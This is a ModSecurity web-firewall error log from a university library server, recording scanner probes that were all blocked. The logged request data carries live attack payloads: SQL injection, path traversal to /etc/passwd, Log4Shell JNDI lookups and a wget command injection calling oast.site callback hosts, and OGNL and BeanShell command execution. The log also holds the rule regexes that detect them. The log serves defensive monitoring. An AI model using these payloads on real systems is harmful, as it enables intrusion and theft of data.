[Tue Aug 29 11:30:39.569041 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOOuXQAAAAW"]
[Tue Aug 29 11:30:41.847895 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAP05E4AAAAA"]
[Tue Aug 29 11:30:42.612291 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOKNpcAAAAK"]
[Tue Aug 29 11:30:43.396302 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlg4ynptqci4qh15.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAOKNpoAAAAK"]
[Tue Aug 29 11:30:43.453265 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPQkgcAAAAe"]
[Tue Aug 29 11:30:44.315532 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAOKNp4AAAAK"]
[Tue Aug 29 11:30:45.347482 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPDn0QAAAAP"]
[Tue Aug 29 11:30:46.380255 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAOH4WYAAAAH"]
[Tue Aug 29 11:30:47.381273 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPxBUAAAAAS"]
[Tue Aug 29 11:30:47.383821 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10d8Co-f0AAAPQkhIAAAAe"]
[Tue Aug 29 11:30:47.441115 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPxBUEAAAAS"]
[Tue Aug 29 11:30:47.601743 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPv-HYAAAAM"]
[Tue Aug 29 11:30:48.306877 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgd8enq6eoqbwyf.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAOKNqsAAAAK"]
[Tue Aug 29 11:30:50.315759 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10esCo-f0AAAPPSx8AAAAd"]
[Tue Aug 29 11:30:50.428772 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAO879IAAAAF"]
[Tue Aug 29 11:30:51.337701 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg3ibmrsxbqhip5.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAO879QAAAAF"]
[Tue Aug 29 11:30:51.380477 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPPSyUAAAAd"]
[Tue Aug 29 11:30:52.360174 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPPSygAAAAd"]
[Tue Aug 29 11:30:52.399849 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOM4aEAAAAU"]
[Tue Aug 29 11:30:53.307885 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPxBVkAAAAS"]
[Tue Aug 29 11:30:53.496540 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPxBV0AAAAS"]
[Tue Aug 29 11:30:54.435035 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPPSzAAAAAd"]
[Tue Aug 29 11:30:54.435651 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAO87@MAAAAF"]
[Tue Aug 29 11:30:54.540722 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAOKNscAAAAK"]
[Tue Aug 29 11:30:55.424457 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAPxBWIAAAAS"]
[Tue Aug 29 11:30:56.309293 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPxBWMAAAAS"]
[Tue Aug 29 11:30:56.344088 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAPRNd8AAAAf"]
[Tue Aug 29 11:30:58.492900 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAP05IIAAAAA"]
[Tue Aug 29 11:30:58.515943 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPPS0IAAAAd"]
[Tue Aug 29 11:30:59.413197 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPDn3gAAAAP"]
